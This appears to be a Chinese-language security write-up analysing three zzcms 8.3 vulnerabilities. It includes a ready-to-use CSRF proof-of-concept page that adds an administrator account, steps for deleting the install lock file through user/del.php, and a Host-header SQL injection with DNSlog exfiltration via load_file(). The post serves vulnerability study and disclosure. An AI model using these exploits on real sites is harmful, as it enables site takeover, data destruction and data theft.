问题文件：/zzcms8.3/admin/adminadd.php漏洞分析常见的CSRF攻击利用方式，由于管理后台设计敏感操作的表单没有设置token，导致可以使用CSRF去添加管理员漏洞复现POC:<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.224.138/admin/adminadd.php?action=add" method="POST"> <input type="hidden" name="groupid" value="1" /> <input type="hidden" name="admins" value="123" /> <input type="hidden" name="passs" value="123" /> <input type="hidden" name="passs2" value="123" /> <input type="submit" value="Submit request" /> </form> </body> </html>只需诱导管理员点击构造好的恶意页面，即可添加管理员

问题文件： /zzcms8.3/user/del.php漏洞分析:漏洞位置在del.php的55到69行，思路比较清晰，首先需要传入tablename令其值为zzcms_main进入分支语句，然后执行SQL语句查询zzcms_main的img,flv,editor的值，之后判断img是否等于/image/nopic.gif，如果不是则添加“../”，如果文件存在则删除。所以我们仅需要在zzcms_main存入恶意img的值就可以删除任意文件。而在/user/zssave.php中可以添加CVE-2018-16344是差不多相同的思路，但是这里上传视频功能需要管理员去开启才可以。实际上这样的漏洞还存在于这套CMS的很多地方，比如user/manage.php等漏洞复现在/user/zssave.php上传图片，点击发布信息抓包，修改img=/install/insall.lock然后访问/user/del.php删除成功显示重装了

问题文件：/zzcms8.3/zt/top.php漏洞分析在top.php的3到6行，使用了$_SERVER['HTTP_HOST']获取域名，并直接拼接到SQL语句，而\$_SERVER是不在cms的全局过滤范围里的，所以如果可以控制host就可以注入。CVE里师傅提供了一个点，就是在Nginx环境下$_SERVER['HTTP_HOST']是可以控制的，如果在Nginx环境好办了，只需找到一个包含top.php的页面就可以进行注入。(实际自己在复现的过程中，apache也是可以的)漏洞复现在/zt/job.php包含了top.php,可以在job.php进行注入。由于没有回显，采用盲注或DNSlog带出数据。简单说一下DNSlog,对于SQL注入,一些注入都是无回显的，我们可以通过布尔或者时间盲注获取内容，但是整个过程效率低，需要发送很多的请求进行判断，容易触发网站的防御机制，而Dnslog盲注可以减少发送的请求，直接回显数据实现注入。DNSlog在MySQL里利用的是load_file()函数，load_file()函数除了可以读取本地的文件还可以用来发送dns解析请求，使用load_file需要有FILE权限。使用时尽量使用Hex编码，可以避免一些特殊符号的产生，这些特殊符号拼接在域名里是无法做dns查询的，因为域名是有一定的规范，有些特殊符号是不能带入的。两个好用的免费dnslog平台：http://ceye.io/ http://dnsbin.zhack.ca